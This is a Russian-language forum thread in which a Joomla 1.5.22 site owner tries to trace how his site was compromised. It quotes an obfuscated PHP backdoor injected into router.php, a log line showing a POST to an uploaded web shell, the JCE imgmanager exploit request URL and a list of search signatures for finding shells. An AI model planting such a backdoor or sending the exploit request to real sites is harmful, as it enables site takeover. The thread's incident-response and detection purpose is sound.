Как оследить бажный компонет (дыру)? - Безопасность сайтов на Joomla

Скажите пожалуйста. Как можно отследить через какую дыру влезли на сайт?

Допустим я уже поставил скрипт, отслеживающий изменения в файлах. Сайт был норм, но потом появились шеллы.
Что можно предпринять что бы узнать через что был залит шелл?  Или шелл возможно залить ттлько через админку? И на сайте где-то есть баг, позволяющий сменить пароль?  Т.к. пароль к админке был поменян.

Т.к. пароль к админке был поменян.

и версия движка 1.5.10 или 1.5.12 а нет путаю 1.5.20 или
экстрасенсы на пенсии

Не, версия Версия 1.5.22
Вроде фишка со знаком ковычки не проканывает.  Скиньте плз  какую надо строку в браузер вводить что бы задействовать эксплоит.

Скиньте плз  какую надо строку в браузер вводить что бы задействовать эксплоит.

а ни чего ломать за вас не надо случайно?
или Google отменили
ключ может еще дать от к.....

а ни чего ломать за вас не надо случайно?
или Google отменили
ключ может еще дать от к.....

Везде только описание бага. Мол надо вставить кавычку и т.п. этот метод не проканывает. Прошу дать на проверку бажности что-нибудь для движка 1.5.22

Ещё в файл   www/htdocs/includes/router.php   прописыают это

function _parseReqRoute($uri) {
      if($uri = JRequest::getVar('options')) {
         $vars = "\x61\x73\x73\x65\x72\x74";
         if(@$vars(get_magic_quotes_gpc()? stripslashes($uri) : $uri)) {
            return true;
         }
      }
   }

Сначала идёт куча запросов


Потом уже шелл появляется

94.242.233.70 - - [21/Jan/2013:22:17:09 +0000] "POST /images/stories/e62mju.php HTTP/1.0" 200 240 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"


Как можно записать полный лог, что бы прояснить ситуацию?

Ещё  вопрос что за цифры после  200?  Это размер данных?  Может если многобой - значит загрузка была всё-таки через админку?

HTTP/1.0" 200 5504 "-"

Нашёл в логах багу по стрчке из сплоита
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20

Прошу пояснить как можно пропатчить без переустановки компонент com_jce.

Или плз напишите все папки, в которых он расположен хочу убрать из них код, и посмотреть сколько атак будет произведено.

А что мешает переустановить JCE?

Это получается в com_jce дырка?

наверно.. до версии 2.0.10 он уязвимый. или как то так.

А что мешает переустановить JCE?

Я не знаю как. Это же джумала. Тут всё сложно.  Вообще хотел сделать такую штуку.  Оставить компонент, но когда будет атака - что бы просто записывался мой файл (псевдошелл).

Вот только не знаю как это реализовать.

Вообще не понимаю что за строка
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743

Что за  6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743

Меняется ли она. Или тля записи файла должна быть неизменна.

о нет... открыл папку с компонентом а там 600 файлов...   Так просто не разобраться.  Придётся удалять (

Удалить через менеджер расширений. оставшееся после удаления файлы, удалить вручную. После этого заново поставить новую версию компонента.

Ну да, так и сделал. Но оставшиеся файлы вручную не удалял. Ибо не знаю где могут остаться.

Я не знаю как. Это же джумала. Тут всё сложно.  Вообще хотел сделать такую штуку.  Оставить компонент, но когда будет атака - что бы просто записывался мой файл (псевдошелл).

Вот только не знаю как это реализовать.

Вообще не понимаю что за строка
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743

Что за  6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743

Меняется ли она. Или тля записи файла должна быть неизменна.

взломали по такой же схеме несколько сайтов ещё картинку злую заливают:)
вот вопрос, а что если просто вставить редирект
RedirectPermanent /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 http://homr

или просто удалить JCE = остановит?

ну я скачал сплоит. проверил - картинка норм заливается. Переустановил JCE - сплоит перестал работать.

Примечательно то, что есть пачка сайтов со старым JCE, но сплоит категорически отказывается работать под большинство. Как так ума не приложу.

или просто удалить JCE = остановит?

если уже сломали то - нет
только чистить

если уже сломали то - нет
только чистить

Ну, просто шелы надо удалить, и прочие штуки которые запихнули.  А сам JCE - можно просто удалить. Ещё раз отмечу что сплоит не все версии пробивает.

Хотел бы спросить норм скрипт (прогу для поиска шеллов и прочих редиректов).

Сам ищу по старинке прогой serch and replace по этим строкам
preg_replace("/./e
eval      -  ZXZhbA -  \x65\x76\x61\x6c   (hex)
base64_decode     -    YmFz (base 64)   -    \x62\x61\x73\x65\x36\x34 (hex)
gzinflate    -     -    \x67\x7A\x69\x6E\x66\x6C\x61\x74\x65 

Ах да, если кто подскажет основные дыры по заливке шеллов в папку images на движках серии 1.5.22 - 1.5.26 (через ядро Joomla)  или самые бажные компоненты.

Т.к. заливают дор регулярно, и видимо через какой-то эксплоит, который эксплуатирует уж очень явную дыру (как в случае с jce)

Т.к. заливают дор регулярно, и видимо через какой-то эксплоит, который эксплуатирует уж очень явную дыру (как в случае с jce)

и логи ни чего не пишут? мистика просто
1 - вы не дочистили, и это скорей всего (уже пальцы болят писать соседние сайты тоже смотрите)
2 - боты массово бьют по JCE и nonumber, ну и бывают индивидуальные случаи

и логи ни чего не пишут? мистика просто

Логи пишут.  Но очень много. Иногда кажется что запущен какой-то сканер на уязвимости, который проверяет баги.  Из-за этого в логах куча записей.

Возьмём случай с JCE.  
1) Есть сайт. На нём старый JCE. Сатй был взломан.
2) Открываем логи. видим строку /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

Кажется что сайт был взломан через JCE. Качаем эксплоит JCE-бот.  Пробуем - ничего не выходит.

3) Ищем дальше.  

Так к чему это я? Когда в логах идёт проверка на уязвимости или много мусора - будет сложно определить через что взломан сайт. Придётся каждую шнягу проверять. Это целую неделю надо сидеть.  

Вот мои компоненты.  Вроде бы там нет nonumber.  А JCE - не уязвим для эксплоита - проверил. Хотя может проверял не так.
http://i53.fastpic.ru/big/2013/0131/09/e917230842441a18cc3567f2aebb7009.jpg
http://fastpic.ru/view/53/2013/0131/af33415a62fa6dc8e89d623d622ab2f1.jpg.html

вопрос к спецам:
я начинающий, поэтому никак не разбирусь, что делает данная функция:
function _parseReqRoute($uri) {
      if($uri = JRequest::getVar('options')) {
         $vars = "\x61\x73\x73\x65\x72\x74";
         if(@$vars(get_magic_quotes_gpc()? stripslashes($uri) : $uri)) {
            return true;
         }
      }
   }

Качаем эксплоит JCE-бот.  Пробуем - ничего не выходит.

вы что хотите научится ломать?

А JCE - не уязвим для эксплоита - проверил. Хотя может проверял не так.

думаю все не так

Вроде бы там нет nonumber.

это в плагинах

чтобы научиться защищать, для этого нужно научиться ломать...

вы что хотите научится ломать?думаю все не такэто в плагинах

я проверял дырявость дырявого плагина и работоспособность эксплоита.
Нет смысла переставлять на 100 сайтов компонент. Легче проверить сначала дыряв ли он. Тем более в паблике только 1 эксплоит пот JCE, который заливает картинку и переименовывает потом её с расширением php.

Если я буду каждый день дырявую джумалу вместе с багоплагинами патчить - мне времени не хватит даже в носу поковырять.

Компонент JCE только позволяет загрузить шелл! или стороний код! для того чтобы это сделать как минимум у пользователя должны быть права автора!, но не имея этих прав вы ничего не сможите сделать!

P.S: Читайте вниматильней багтреки!
http://www.securitylab.ru/vulnerability/424641.php
 

2. Уязвимость существует из-за того, что сценарий components/com_jce/editor/extensions/browser/file.php (когда параметр "chunk" установлен на значение больше "0") неправильно проверяет загружаемые файлы. Удаленный пользователь может с помощью специально сформированного PHP файла с расширением, к примеру, ".jpg.pht" выполнить произвольный код на целевой системе.

Примечание: Для успешной эксплуатации уязвимости необходимо иметь привилегии "Author".
 

Если я буду каждый день дырявую джумалу

Ivankalikemanka, И вот почему Joomla дырявая а все что ставите на нее не считаете дырявым?